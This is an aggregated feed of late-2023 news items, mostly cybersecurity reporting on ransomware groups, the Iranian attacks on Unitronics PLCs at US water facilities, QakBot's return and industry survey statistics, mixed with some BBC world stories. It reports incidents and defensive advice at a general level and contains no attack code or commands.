      2023-12-29 https://www.bbc.co.uk/news/world-latin-america-67842992?at_medium=RSS&at_campaign=KARANGA
      It had been due in a few days to join the group, seen as a counterweight to the Western-led world.


      Eagers Automotive halts trading in response to cyberattack

      industry ciber
      2023-12-28 https://www.bleepingcomputer.com/news/security/eagers-automotive-halts-trading-in-response-to-cyberattack/
      Eagers Automotive has announced it suffered a cyberattack and was forced to halt trading on the stock exchange as it evaluates the impact of the incident. [...]

      Autosummary: Eagers Automotive is the largest operator of car dealerships in Australia and New Zealand, with over 300 selling points for brands such as Toyota, BMW, Nissan, Mercedes-Benz, Audi, Ford, VW, and Honda.


      Essential DDoS statistics for understanding attack impact

      industry
      2023-12-27 https://www.helpnetsecurity.com/2023/12/27/ddos-attack-2023-statistics/

      The impact of DDoS attacks extends far beyond mere inconvenience, as they can result in financial losses, compromised data, and erosion of customer trust. Understanding the nature and consequences of DDoS activity is essential for organizations and individuals alike as they strive to protect their online presence and ensure the uninterrupted flow of critical services. In this article, you will find excerpts from DDoS attack surveys we covered in 2023. This data will enable your … More

      The post Essential DDoS statistics for understanding attack impact appeared first on Help Net Security.

      "

      Autosummary: Global rise in DDoS attacks threatens digital infrastructure. In 2022, the total number of DDoS attacks worldwide increased by 115.1% over the amount observed in 2021, according to Nexusguard.


      Data security and cost are key cloud adoption challenges for financial industry

      financial industry
      2023-12-27 https://www.helpnetsecurity.com/2023/12/27/financial-services-cloud-adoption/

      91% of banks and insurance companies have now initiated their cloud journey, a significant increase from 2020, when only 37% of firms had embarked on their cloud transformations, according to Capgemini. However, this high rate and its corresponding investment does not translate to effective cloud adoption at scale. More than 50% of firms surveyed have only moved a minimal portion of their core business applications to the cloud. 89% of financial services executives believe that … More

      The post Data security and cost are key cloud adoption challenges for financial industry appeared first on Help Net Security.

      "

      Autosummary: Cloud migration priorities include risk and customer relationship management. Industry executives surveyed in this report across health insurance, life insurance, capital markets, payments, retail banks and wealth management identify risk management and customer relationship management (CRM) amongst their top three areas ripe for early cloud adoption. Recently, the Digital Operational Resilience Act (DORA) mandated that financial institutions subject to European Union (EU) regulations must rigorously implement, document, and uphold the requisite systems, protocols, and tools to provide sufficient reliability, capacity, and resilience.


      Renewable energy drive for indigenous groups in Colombia

      latam industry
      2023-12-27 https://www.bbc.co.uk/news/world-latin-america-67825466?at_medium=RSS&at_campaign=KARANGA
      Local communities and indigenous groups can now set up partnerships to produce and sell renewable energy.


      3 main tactics attackers use to bypass MFA

      industry
      2023-12-26 https://www.helpnetsecurity.com/2023/12/26/tactics-bypass-mfa/

      Notable security breaches have bypassed MFA to compromise taxi broker Uber, games company EA, and authentication business Okta, according to SE Labs. CISOs must bolster MFA protections: SE Labs advised CISOs to step up their efforts against attacks on systems protected by MFA in response to increased attacker activity to exploit failure points. As is often the case when compromising systems, attackers have not reinvented the wheel to circumvent MFA, or 2FA (two-factor authentication), as it … More

      The post 3 main tactics attackers use to bypass MFA appeared first on Help Net Security.

      "

      Autosummary: “MFA is still one of the best security measures people can use since the password was invented, but as organisations shore up their defences deploying it, so attackers are switching tactics and working hard to find ways around it,” says Simon Edwards, CEO of SE Labs.


      Carbanak Banking Malware Resurfaces with New Ransomware Tactics

      financial exploits ransomware industry
      2023-12-26 https://thehackernews.com/2023/12/carbanak-banking-malware-resurfaces.html
      The banking malware known as Carbanak has been observed being used in ransomware attacks with updated tactics. "The malware has adapted to incorporate attack vendors and techniques to diversify its effectiveness," cybersecurity firm NCC Group said in an analysis of ransomware attacks that took place in November 2023. "Carbanak returned last month through new

      Autosummary: " The company"s data shows that industrials (33%), consumer cyclicals (18%), and healthcare (11%) emerged as the top targeted sectors, with North America (50%), Europe (30%), and Asia (10%) accounting for most of the attacks. "


      Iran-linked APT33 targets Defense Industrial Base sector with FalseFont backdoor

      industry
      2023-12-25 https://securityaffairs.com/156366/apt/apt33-falsefont-targets-defense-sector.html
      Microsoft reports that the Iran-linked APT33 group is targeting defense contractors worldwide with the FalseFont backdoor. Microsoft says the APT33 (aka Peach Sandstorm, Holmium, Elfin, and Magic Hound) Iranian cyber-espionage group is using the recently discovered FalseFont backdoor malware to attack organizations in the Defense Industrial Base (DIB) sector. “Microsoft has observed the Iranian nation-state actor Peach Sandstorm attempting to […]

      Autosummary: Iran-linked APT33 targets Defense Industrial Base sector with FalseFont backdoor, Pierluigi Paganini, December 25, 2023. Microsoft reports that the Iran-linked APT33 group is targeting defense contractors worldwide with FalseFont backdoor.


      New insights into the global industrial cybersecurity landscape

      industry ciber
      2023-12-22 https://www.helpnetsecurity.com/2023/12/22/critical-infrastructure-security-professionals-video/

      In this Help Net Security video, William Noto, VP and Industry Principal for Claroty, discusses their recent global survey of 1,100 IT and OT security professionals who work in critical infrastructure sectors. When it comes to ransomware attacks, the impact on OT environments is catching up to the impact on IT environments, according to Claroty. Of the 75% of respondents whose organizations were targeted by ransomware attacks in the past year, 69% paid the ransom, … More

      The post New insights into the global industrial cybersecurity landscape appeared first on Help Net Security.

      "


      China to increase curbs on video gaming industry

      industry
      2023-12-22 https://www.bbc.co.uk/news/technology-67801091?at_medium=RSS&at_campaign=KARANGA
      New plans to restrict the online gaming industry in the country send shares in tech giants tumbling.


      A closer look at the manufacturing threat landscape

      industry
      2023-12-21 https://www.helpnetsecurity.com/2023/12/21/manufacturers-threats-video/

      The manufacturing industry is embracing digital transformation to fuel efficiency and productivity. However, this evolution is accompanied by profound and growing cybersecurity challenges. In this Help Net Security video, Kory Daniels, CISO at Trustwave, discusses recent comprehensive research highlighting the distinct cybersecurity threats confronting manufacturers. Trustwave SpiderLabs has documented the attack flow utilized by threat groups, exposing their tactics, techniques, and procedures. From email-borne malware to exploiting SMB and DCOM protocols for lateral movement, these … More

      The post A closer look at the manufacturing threat landscape appeared first on Help Net Security.

      "


      Supply chain emerges as major vector in escalating automotive cyberattacks

      industry ciber
      2023-12-20 https://www.helpnetsecurity.com/2023/12/20/automotive-cyberattacks-video/

      In this Help Net Security video, Jay Yaneza, Cybersecurity Architect at VicOne, discusses how, in the first half of the year, cyberattacks on the automotive sector caused losses exceeding $11 billion. These attacks mainly targeted automotive suppliers, not OEMs, showing an increasing trend in supply chain vulnerabilities. Over 90% of the attacks focused on entities other than OEMs.

      The post Supply chain emerges as major vector in escalating automotive cyberattacks appeared first on Help Net Security.

      "


      Behind the Scenes of Matveev's Ransomware Empire: Tactics and Team

      exploits ransomware industry
      2023-12-19 https://thehackernews.com/2023/12/behind-scenes-of-matveevs-ransomware.html
      Cybersecurity researchers have shed light on the inner workings of the ransomware operation led by Mikhail Pavlovich Matveev, a Russian national who was indicted by the U.S. government earlier this year for his alleged role in launching thousands of attacks across the world. Matveev, who resides in Saint Petersburg and is known by the aliases Wazawaka, m1x, Boriselcin, Uhodiransomwar,

      Autosummary: Matveev, besides working as an affiliate for Conti, LockBit, Hive, Monti, Trigona, and NoEscape, also had a management-level role with the Babuk ransomware group up until early 2022, while sharing what's being described as a "complex relationship" with another actor named Dudka, who is likely the developer behind Babuk and Monti.


      CISA Urges Manufacturers Eliminate Default Passwords to Thwart Cyber Threats

      industry
      2023-12-18 https://thehackernews.com/2023/12/cisa-urges-manufacturers-eliminate.html
      The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is urging manufacturers to get rid of default passwords on internet-exposed systems altogether, citing severe risks that could be exploited by malicious actors to gain initial access to, and move laterally within, organizations. In an alert published last week, the agency called out Iranian threat actors affiliated with

      Autosummary: The development also follows the release of a new advisory from CISA that outlines security countermeasures for healthcare and critical infrastructure entities to fortify their networks against potential malicious activity and reduce the likelihood of domain compromise: enforce strong passwords and phishing-resistant MFA; ensure that only ports, protocols, and services with validated business needs are running on each system; configure service accounts with only the permissions necessary for the services they operate; change all default passwords for applications, operating systems, routers, firewalls, wireless access points, and other systems; discontinue reuse or sharing of administrative credentials among user/administrative accounts; mandate consistent patch management; implement network segregation controls; evaluate the use of unsupported hardware and software and discontinue where possible; encrypt personally identifiable information (PII) and other sensitive data. On a related note, the U.S. National Security Agency (NSA), Office of the Director of National Intelligence (ODNI), and CISA published a list of recommended practices that organizations can adopt in order to harden the software supply chain and improve the safety of their open-source software management processes.


      QakBot Malware Resurfaces with New Tactics, Targeting the Hospitality Industry

      exploits industry
      2023-12-18 https://thehackernews.com/2023/12/qakbot-malware-resurfaces-with-new.html
      A new wave of phishing messages distributing the QakBot malware has been observed, more than three months after a law enforcement effort saw its infrastructure dismantled by infiltrating its command-and-control (C2) network. Microsoft, which made the discovery, described it as a low-volume campaign that began on December 11, 2023, and targeted the hospitality industry. "Targets


      Qakbot is back and targets the Hospitality industry

      industry
      2023-12-18 https://securityaffairs.com/156047/cyber-crime/qakbot-targets-hospitality-industry.html
      Experts warn of a new phishing campaign distributing the QakBot malware, months after law enforcement dismantled its infrastructure. In August, the FBI announced that the Qakbot botnet was dismantled as a result of an international law enforcement operation named Operation ‘Duck Hunt.’ Qakbot, also known as QBot, QuackBot and Pinkslipbot, is an info-stealing malware that has been active since 2008. The […]

      Autosummary: Qakbot is back and targets the Hospitality industry, Pierluigi Paganini, December 18, 2023. Experts warn of a new phishing campaign distributing the QakBot malware, months after law enforcement dismantled its infrastructure.


      Qbot malware returns in campaign targeting hospitality industry

      exploits industry
      2023-12-17 https://www.bleepingcomputer.com/news/security/qbot-malware-returns-in-campaign-targeting-hospitality-industry/
      The QakBot malware is once again being distributed in phishing campaigns after the botnet was disrupted by law enforcement over the summer. [...]

      Autosummary: In the past, Qakbot has partnered with multiple ransomware operations, including Conti, ProLock, Egregor, REvil, RansomExx, MegaCortex, and, most recently, Black Basta and BlackCat/ALPHV.


      CISA urges tech manufacturers to stop using default passwords

      industry
      2023-12-15 https://www.bleepingcomputer.com/news/security/cisa-urges-tech-manufacturers-to-stop-using-default-passwords/
      Today, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) urged technology manufacturers to stop providing software and devices with default passwords. [...]

      Autosummary: "This SbD Alert urges technology manufacturers to proactively eliminate the risk of default password exploitation," CISA said, by taking "ownership of customer security outcomes" and building "organizational structure and leadership to achieve these goals. "


      Microsoft ICSpector: A leap forward in industrial PLC metadata analysis

      industry
      2023-12-14 https://www.helpnetsecurity.com/2023/12/14/microsoft-icspector-industrial-plc-metadata-analysis/

      Microsoft ICSpector is an open-source forensics framework that enables the analysis of industrial PLC metadata and project files. Architecture: the framework provides investigators with a convenient way to scan for PLCs and identify any suspicious artifacts within ICS environments, which can be used for manual checking, automated monitoring tasks, or incident response operations to detect compromised devices. ICSpector allows investigators to review and customize the output to their requirements. It’s available on GitHub.

      The post Microsoft ICSpector: A leap forward in industrial PLC metadata analysis appeared first on Help Net Security.

      "


      Industry regulations and standards are driving OT security priorities

      industry
      2023-12-13 https://www.helpnetsecurity.com/2023/12/13/ot-environments-ransomware-impact/

      When it comes to ransomware attacks, the impact on OT environments is catching up to the impact on IT environments, according to Claroty. In Claroty’s previous survey conducted in 2021, 32% of ransomware attacks impacted IT only, while 27% impacted both IT and OT. Today, 21% impact IT only, while 37% impact both IT and OT – a significant 10% jump for the latter in just two years. This trend speaks to the expanding attack … More

      The post Industry regulations and standards are driving OT security priorities appeared first on Help Net Security.

      "

      Autosummary: The most popular methods are the Common Vulnerability Scoring System (CVSS), used by 52% of global respondents, followed by existing security solutions’ risk scores (49%), the Exploit Prediction Scoring System (EPSS) (46%), and the Known Exploited Vulnerabilities (KEV) Catalog (45%).


      How to choose a free vulnerability scanner: Insights from an industry veteran

      exploits industry
      2023-12-12 https://www.malwarebytes.com/blog/business/2023/12/how-to-choose-a-free-vulnerability-scanner-insights-from-an-industry-veteran
      How to choose a free vulnerability scanner? Industry expert Robert Elworthy has the answers.

      Autosummary: Alternative: ThreatDown Vulnerability Assessment solution. For teams seeking a streamlined approach, the ThreatDown Vulnerability Assessment solution, free for all ThreatDown customers, offers a single, lightweight agent: to simplify security and reduce costs, Vulnerability Assessment deploys easily in minutes without a reboot, using the same agent and cloud-based console that powers all ThreatDown endpoint security technologies. Elworthy, reflecting on his Langdale experience, highlights the importance of a tool capable of handling large-scale environments efficiently, a critical aspect for organizations with extensive networks: “Free tools often struggle with large networks,” Elworthy said. Elworthy points out the hidden labor costs in using “free” tools, which can affect team efficiency: “The time and labor required to maintain scans and update tools can be significant,” Elworthy said, reflecting on his time at Langdale.


      Coral reef: How divers are using antibiotics to save sick corals

      industry
      2023-12-10 https://www.bbc.co.uk/news/world-latin-america-67647402?at_medium=RSS&at_campaign=KARANGA
      Turks and Caicos Islanders are helping protect the reef from the deadliest ever coral sickness.


      Third-party breaches shake the foundations of the energy sector

      industry
      2023-12-07 https://www.helpnetsecurity.com/2023/12/07/energy-industry-third-party-breaches/

      90% of the world’s largest energy companies experienced a third-party breach in the past 12 months, according to SecurityScorecard. Powering the global economy and everyday activities, the energy sector’s significance makes it a key focus for cyber threats. The urgency to protect this critical sector grows amid economic and political uncertainties. Cyberattacks on energy don’t just cause financial losses and disruptions; they also impact manufacturing, healthcare, and transportation. Third-party breaches in the energy industry 100% …

      Autosummary: Successful management of third-party cyber risks relies on achieving three essential outcomes: efficient use of resources; effective risk management and resilience; and impact on business decision-making. “Hope and prayer may be useful but are clearly not sustainable strategies.”


      Microsoft Warns of COLDRIVER's Evolving Evading and Credential-Stealing Tactics

      industry
      2023-12-07 https://thehackernews.com/2023/12/microsoft-warns-of-coldrivers-evolving.html
      The threat actor known as COLDRIVER has continued to engage in credential theft activities against entities that are of strategic interest to Russia while simultaneously improving its detection evasion capabilities. The Microsoft Threat Intelligence team is tracking the cluster as Star Blizzard (formerly SEABORGIUM). It's also called Blue Callisto, BlueCharlie (or TAG-53),

      Autosummary: The adversary "continues to prolifically target individuals and organizations involved in international affairs, defense, and logistics support to Ukraine, as well as academia, information security companies, and other entities aligning with Russian state interests," Redmond said.


      21 high-risk vulnerabilities in OT/IoT routers found

      industry
      2023-12-06 https://www.helpnetsecurity.com/2023/12/06/vulnerabilities-ot-iot-routers/

      Forescout detailed the discovery of 21 new vulnerabilities in OT/IoT routers and open-source software elements. The “SIERRA:21 – Living on the Edge” report features research into Sierra Wireless AirLink cellular routers and some open-source components, such as TinyXML and OpenNDS. Sierra Wireless routers are popular — an open database of Wi-Fi networks shows 245,000 networks worldwide running Sierra Wireless for various applications. For example, Sierra Wireless routers are used for police vehicles connecting to a …

      Autosummary: Regions with the highest number of exposed devices include: 68,605 devices in the United States; 5,580 in Canada; 3,853 in Australia; 2,329 in France; 1,001 in Thailand. Among the 21 vulnerabilities, one has critical severity (CVSS score 9.6), nine have high severity, and 11 have medium severity.


      Resecurity and ICS Technologies join forces to improve cybersecurity in Iraq

      industry ciber
      2023-12-05 https://www.helpnetsecurity.com/2023/12/05/resecurity-ics-technologies-iraq-partnership/

      Resecurity and ICS Technologies IRAQ, a well-established ICT System Integration Company with HQ in Baghdad, Iraq, have joined forces to fortify cybersecurity, fraud prevention and risk intelligence measures nationwide. This strategic partnership is poised to bring intelligence-driven defensive solutions to Iraq, helping consumers and organizations safeguard their digital assets and combat the evolving threat landscape. Resecurity, headquartered in the United States, is renowned for its innovative cybersecurity products and threat intelligence services. Under the visionary …

      Autosummary: Key highlights of the partnership: Advanced cybersecurity solutions: Resecurity, known for its advanced threat intelligence, threat hunting, incident response, and digital risk management solutions, will provide Iraq-based organizations with state-of-the-art cybersecurity tools to protect against a wide range of cyber threats.


      Essequibo: Venezuelans vote to claim Guyana-controlled oil region

      industry
      2023-12-04 https://www.bbc.co.uk/news/world-latin-america-67610200?at_medium=RSS&at_campaign=KARANGA
      Over 95% of voters approve a territorial claim to oil-rich Essequibo, electoral officials say.


      New P2PInfect Botnet MIPS Variant Targeting Routers and IoT Devices

      industry
      2023-12-04 https://thehackernews.com/2023/12/new-p2pinfect-botnet-mips-variant.html
      Cybersecurity researchers have discovered a new variant of an emerging botnet called P2PInfect that's capable of targeting routers and IoT devices. The latest version, per Cado Security Labs, is compiled for Microprocessor without Interlocked Pipelined Stages (MIPS) architecture, broadening its capabilities and reach. "It's highly likely that by targeting MIPS, the P2PInfect developers


      CyberAv3ngers hit Unitronics PLCs at multiple US-based water facilities

      industry
      2023-12-04 https://www.helpnetsecurity.com/2023/12/04/cyberav3ngers-unitronics-plcs/

      Iran-affiliated attackers CyberAv3ngers continue to exploit vulnerable Unitronics programmable logic controllers (PLCs), US and Israeli authorities have said in a joint cybersecurity advisory. CyberAv3ngers targeting Unitronics PLCs: CISA has recently confirmed that Iran-affiliated attackers took over a Unitronics Vision Series PLC at a water system facility in Pennsylvania, and urged other water authorities to promptly secure their Unitronics PLCs. The agency has advised them to change the default password and port used by the PLC, …

      Autosummary: Finally, they called on device manufacturers to do their part in securing OT devices by: not shipping products with default passwords; avoiding the exposure of administrative interfaces to the internet; not imposing additional fees for security features; making sure the devices support MFA. Other Iran-affiliated threat groups to look out for: CyberAv3ngers are not the only Iranian cyber threat actors targeting Israeli and US entities, Check Point researchers pointed out.


      New P2PInfect bot targets routers and IoT devices

      industry
      2023-12-04 https://securityaffairs.com/155206/malware/p2pinfect-bot-routers-iot-devices.html
      Cybersecurity researchers discovered a new variant of the P2PInfect botnet that targets routers and IoT devices. Researchers at Cado Security Labs discovered a new variant of the P2PInfect botnet that targets routers, IoT devices, and other embedded devices. This variant has been compiled for the Microprocessor without Interlocked Pipelined Stages (MIPS) architecture. The new bot supports updated […]

      Autosummary: Pierluigi Paganini, December 04, 2023.


      Essequibo: Venezuela votes on claim to Guyana-controlled oil region

      industry
      2023-12-03 https://www.bbc.co.uk/news/world-latin-america-67583582?at_medium=RSS&at_campaign=KARANGA
      The referendum asks if Venezuelans support the claim to two thirds of the land controlled by Guyana.


      IRGC-Affiliated Cyber Actors Exploit PLCs in Multiple Sectors, Including U.S. Water and Wastewater Systems Facilities

      exploits industry
      2023-12-01 https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-335a

      SUMMARY

      The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), Environmental Protection Agency (EPA), and the Israel National Cyber Directorate (INCD)—hereafter referred to as "the authoring agencies"—are disseminating this joint Cybersecurity Advisory (CSA) to highlight continued malicious cyber activity against operational technology devices by Iranian Government Islamic Revolutionary Guard Corps (IRGC)-affiliated Advanced Persistent Threat (APT) cyber actors.

      The IRGC is an Iranian military organization that the United States designated as a foreign terrorist organization in 2019. IRGC-affiliated cyber actors using the persona “CyberAv3ngers” are actively targeting and compromising Israeli-made Unitronics Vision Series programmable logic controllers (PLCs). These PLCs are commonly used in the Water and Wastewater Systems (WWS) Sector and are additionally used in other industries including, but not limited to, energy, food and beverage manufacturing, and healthcare. The PLCs may be rebranded and appear as different manufacturers and companies. In addition to the recent CISA Alert, the authoring agencies are releasing this joint CSA to share indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) associated with IRGC cyber operations.

      Since at least November 22, 2023, these IRGC-affiliated cyber actors have continued to compromise default credentials in Unitronics devices. The IRGC-affiliated cyber actors left a defacement image stating, “You have been hacked, down with Israel. Every equipment ‘made in Israel’ is CyberAv3ngers legal target.” The victims span multiple U.S. states. The authoring agencies urge all organizations, especially cr

      Autosummary: Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the authoring agencies. The authoring agencies do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. On October 18, 2023, the CyberAv3ngers-linked Soldiers of Solomon claimed responsibility for compromising over 50 servers, security cameras, and smart city management systems in Israel; however, the majority of these claims were proven false. By using secure by design tactics, software manufacturers can make their product lines secure “out of the box” without requiring customers to spend additional resources making configuration changes, purchasing tiered security software and logs, monitoring, and making routine updates. VALIDATE SECURITY CONTROLS: In addition to applying mitigations, the authoring agencies recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory.


      CISA urges water facilities to secure their Unitronics PLCs

      industry
      2023-11-30 https://www.helpnetsecurity.com/2023/11/30/water-system-secure-plcs/

      News that Iran-affiliated attackers have taken over a programmable logic controller (PLC) at a water system facility in Pennsylvania has been followed by a public alert urging other water authorities to immediately secure their own PLCs. “The cyber threat actors likely accessed the affected device—a Unitronics Vision Series PLC with a Human Machine Interface (HMI)—by exploiting cybersecurity weaknesses, including poor password security and exposure to the internet,” the Cybersecurity and Infrastructure Security Agency (CISA) noted. …


      Business metrics for Cisco Cloud Observability capability enables customers to protect revenue

      industry
      2023-11-29 https://www.helpnetsecurity.com/2023/11/29/cisco-cloud-observability-business-metrics/

      Cisco announced new business metrics in Cisco Cloud Observability, powered by the Cisco Observability Platform, to enhance business context for modern applications running on AWS. This latest release also supports integration with AWS services and application performance monitoring (APM) correlation and provides end-to-end visibility into the performance of cloud native applications. Traditional application monitoring tools only provide visibility of application and infrastructure performance metrics. This leaves teams, including ITOps, DevOps and SREs, managing modern applications …

      Autosummary: “Cisco Cloud Observability will allow us to visualize and correlate metrics, events, logging, and tracing (MELT) data so we can identify, triage, and troubleshoot problems at an even greater velocity,” said Alice McElroy, Director, IT Operational Excellence, Royal Caribbean.


      Iranian Hackers Exploit PLCs in Attack on Water Authority in U.S.

      exploits industry
      2023-11-29 https://thehackernews.com/2023/11/iranian-hackers-exploit-plcs-in-attack.html
      The U.S. Cybersecurity and Infrastructure Security Agency (CISA) revealed that it's responding to a cyber attack that involved the active exploitation of Unitronics programmable logic controllers (PLCs) to target the Municipal Water Authority of Aliquippa in western Pennsylvania. The attack has been attributed to an Iranian-backed hacktivist collective known as Cyber Av3ngers. "Cyber threat


      Microsoft starts testing new Windows 11 Energy Saver feature

      industry
      2023-11-29 https://www.bleepingcomputer.com/news/microsoft/microsoft-starts-testing-new-windows-11-energy-saver-feature/
      Microsoft has started testing a new Windows 11 Energy Saver feature that helps customers extend their portable computers' battery life. [...]


      Hackers breach US water facility via exposed Unitronics PLCs

      industry
      2023-11-29 https://www.bleepingcomputer.com/news/security/hackers-breach-us-water-facility-via-exposed-unitronics-plcs/
      CISA (Cybersecurity & Infrastructure Security Agency) is warning that threat actors breached a U.S. water facility by hacking into Unitronics programmable logic controllers (PLCs) exposed online. [...]

      Autosummary: "Cyber threat actors are targeting PLCs associated with WWS facilities, including an identified Unitronics PLC, at a U.S. water facility," reads CISA's alert.


      N. Korean Hackers 'Mixing' macOS Malware Tactics to Evade Detection

      exploits industry
      2023-11-28 https://thehackernews.com/2023/11/n-korean-hackers-mixing-and-matching.html
      The North Korean threat actors behind macOS malware strains such as RustBucket and KANDYKORN have been observed "mixing and matching" different elements of the two disparate attack chains, leveraging RustBucket droppers to deliver KANDYKORN. The findings come from cybersecurity firm SentinelOne, which also tied a third macOS-specific malware called ObjCShellz to the RustBucket campaign.


      Cybellum achieves significant market share growth among leading medical device manufacturers

      industry
      2023-11-28 https://www.helpnetsecurity.com/2023/11/28/cybellum-medical-device-manufacturers-market-share/

      Cybellum announced that it has significantly increased its market share amongst leading medical device manufacturers (MDMs). Working with companies across the industry, Cybellum’s approach provides risk visibility throughout the full product lifecycle. It also presents opportunities to manage risks so product security teams can make decisions that balance their security demands with business requirements. In today’s complex healthcare landscape with increasing regulatory oversight, medical device manufacturers are facing two main challenges. The first is managing …


      Qilin ransomware claims attack on automotive giant Yanfeng

      exploits ransomware industry
      2023-11-28 https://www.bleepingcomputer.com/news/security/qilin-ransomware-claims-attack-on-automotive-giant-yanfeng/
      The Qilin ransomware group has claimed responsibility for a cyber attack on Yanfeng Automotive Interiors (Yanfeng), one of the world's largest automotive parts suppliers. [...]

      Autosummary: It sells interior components to General Motors, the Volkswagen Group, Ford, Stellantis (Fiat, Chrysler, Jeep, Dodge), BMW, Daimler AG, Toyota, Honda, Nissan, and SAIC Motor.


      Rhysida ransomware gang claimed China Energy hack

      exploits ransomware industry
      2023-11-25 https://securityaffairs.com/154785/cyber-crime/rhysida-ransomware-china-energy.html
      The Rhysida ransomware group claimed to have hacked the Chinese state-owned energy conglomerate China Energy Engineering Corporation. The Rhysida ransomware gang added the China Energy Engineering Corporation to the list of victims on its Tor leak site. The China Energy Engineering Corporation (CEEC) is a state-owned company in China that operates in the energy and […]

      Autosummary: “Threat actors leveraging Rhysida ransomware are known to impact ‘targets of opportunity,’ including victims in the education, healthcare, manufacturing, information technology, and government sectors.” The ransomware gang hit organizations in multiple industries, including the education, healthcare, manufacturing, information technology, and government sectors.


      Automotive parts giant AutoZone disclosed data breach after MOVEit hack

      financial industry
      2023-11-23 https://securityaffairs.com/154633/data-breach/autozone-data-breach-after-moveit-hack.html
      American retailer and distributor of automotive parts and accessories AutoZone discloses a data breach after a MOVEit attack. AutoZone is an American retailer and distributor of automotive parts and accessories. The company is one of the largest aftermarket automotive parts and accessories retailers in the United States. AutoZone operates 7,140 stores across the United States, […]

      Autosummary: Below is the list of organizations with the highest number of impacted individuals (organization, individuals): Maximus, 11 million; Pôle emploi, 10 million; Louisiana Office of Motor Vehicles, 6 million; Colorado Department of Health Care Policy and Financing, 4 million; Oregon Department of Transportation, 3.5 million; Teachers Insurance and Annuity Association of America, 2.6 million; Genworth, 2.5 million; PH Tech, 1.7 million; Milliman Solutions, 1.2 million; Wilton Reassurance Company, 1.2 million. “U.S.-based organizations account for 83.9 percent of known victims, Germany-based 3.6 percent, Canada-based 2.6 percent, and U.K.-based 2.1 percent.”


      DarkGate and PikaBot Malware Resurrect QakBot's Tactics in New Phishing Attacks

      financial exploits industry
      2023-11-20 https://thehackernews.com/2023/11/darkgate-and-pikabot-malware-resurrect.html
      Phishing campaigns delivering malware families such as DarkGate and PikaBot are following the same tactics previously used in attacks leveraging the now-defunct QakBot trojan. “These include hijacked email threads as the initial infection, URLs with unique patterns that limit user access, and an infection chain nearly identical to what we have seen with QakBot delivery,” Cofense said in a report


      Rise in automated attacks troubles ecommerce industry

      industry
      2023-11-17 https://www.helpnetsecurity.com/2023/11/17/online-retailers-automated-attacks-threat/

      Automated attacks on application business logic, carried out by sophisticated bad bots, were the leading threat for online retailers, according to Imperva. In addition, account takeover, DDoS, API abuse, and client-side attacks were significant risks. The ecommerce industry remains a lucrative target for cybercriminal activity. Built on a vast network of API connections and third-party dependencies, online retailers are increasingly vulnerable to business logic abuse and client-side attacks. Motivated cybercriminals are also eager to compromise …

      Autosummary: “The security risks that the retail industry faces are more sophisticated, automated, and harder to detect,” says Karl Triebes, SVP and GM, Application Security, Imperva. Security incidents spike amid shopping season: A successful security incident can lead to higher infrastructure and support costs, degraded online services, and, ultimately, customer churn.


      FBI shares tactics of notorious Scattered Spider hacker collective

      industry
      2023-11-16 https://www.bleepingcomputer.com/news/security/fbi-shares-tactics-of-notorious-scattered-spider-hacker-collective/
      The Federal Bureau of Investigation and the Cybersecurity and Infrastructure Security Agency released an advisory about the evasive threat actor tracked as Scattered Spider, a loosely knit hacking collective that now collaborates with the ALPHV/BlackCat Russian ransomware operation. [...]

      Autosummary: Scattered Spider, also known as 0ktapus, Starfraud, UNC3944, Scatter Swine, Octo Tempest, and Muddled Libra, is adept at social engineering and relies on phishing, multi-factor authentication push bombing (targeted MFA fatigue), and SIM swapping to gain initial network access to large organizations. Tools listed: Remote web server access via internet tunneling; Pulseway: Remote system monitoring and management; Screenconnect: Network device remote connection management; Splashtop: Network device remote connection management; Tactical.


      Nuclear and oil & gas are major targets of ransomware groups in 2024

      exploits ransomware industry
      2023-11-15 https://www.helpnetsecurity.com/2023/11/15/2024-ransomware-groups-targets/

      Resecurity, Inc. (USA), which protects major Fortune 100 and government agencies globally, has identified an alarming rise in ransomware operators targeting the energy sector, including nuclear facilities and related research entities. Over the last year, ransomware attackers have targeted energy installations in North America, Asia, and the European Union. In the EU, Handelsblatt reported that ransomware attacks targeting the energy sector more than doubled in 2022 over the previous year, with defenders recording 21 attacks through …


      Collaborative strategies are key to enhanced ICS security

      industry
      2023-11-14 https://www.helpnetsecurity.com/2023/11/14/marko-gulan-schneider-electric-industrial-control-systems-security/

      In this Help Net Security interview, Marko Gulan, Cyber Security Consultant at Schneider Electric, discusses the complexities of safeguarding industrial control systems (ICS). Our conversation will explore the importance of cross-departmental collaboration, balancing security with system functionality, and the dynamic nature of security measures that evolve with emerging threats. We’ll also look at the critical synergy between IT and OT departments and the role of the IEC 62443 standards in staying ahead in the threat …

      Autosummary: The IT department is usually responsible for managing computer systems, networks, and data, while the OT department manages operating systems, industrial control systems, and sensors. In addition, the IEC 62443 standard also promotes cooperation between various stakeholders, including manufacturers, operators, system integrators and security professionals. This includes the application of technical security controls, such as firewalls, antivirus programs, encryption, and access controls.


      Nuclear and Oil & Gas are Major Targets of Ransomware Groups in 2024

      exploits ransomware industry
      2023-11-14 https://securityaffairs.com/154113/malware/ransomware-gangs-targets-nuclear-and-oil-gas-2024.html

      Experts warn of an alarming rise in ransomware operations targeting the energy sector, including nuclear facilities and related research entities. Resecurity, Inc. (USA), which protects major Fortune 100 and government agencies globally, has identified an alarming rise in ransomware operators targeting the energy sector, including nuclear facilities and related research entities. Over the last year, ransomware […]

      Autosummary: Pierluigi Paganini, November 14, 2023.


      Amazon latest firm to cut jobs in gaming industry

      industry
      2023-11-14 https://www.bbc.co.uk/news/technology-67417330?at_medium=RSS&at_campaign=KARANGA
      It has been a banner year for video games, yet studios continue to sack staff.


      Danish energy sector hit by a wave of coordinated cyberattacks

      industry ciber
      2023-11-14 https://www.helpnetsecurity.com/2023/11/14/danish-energy-sector-cyberattack/

      The Danish energy sector has suffered what is believed to be the most extensive cyberattack in Danish history, according to SektorCERT. Danish energy sector under attack: SektorCERT, an organization owned and funded by Danish critical infrastructure (CI) companies, uses a network of 270 sensors implemented across the country and these organizations to monitor internet traffic and detect possible cyberattacks. From this vantage point, in May 2023, they detected three waves of attacks targeting companies in …


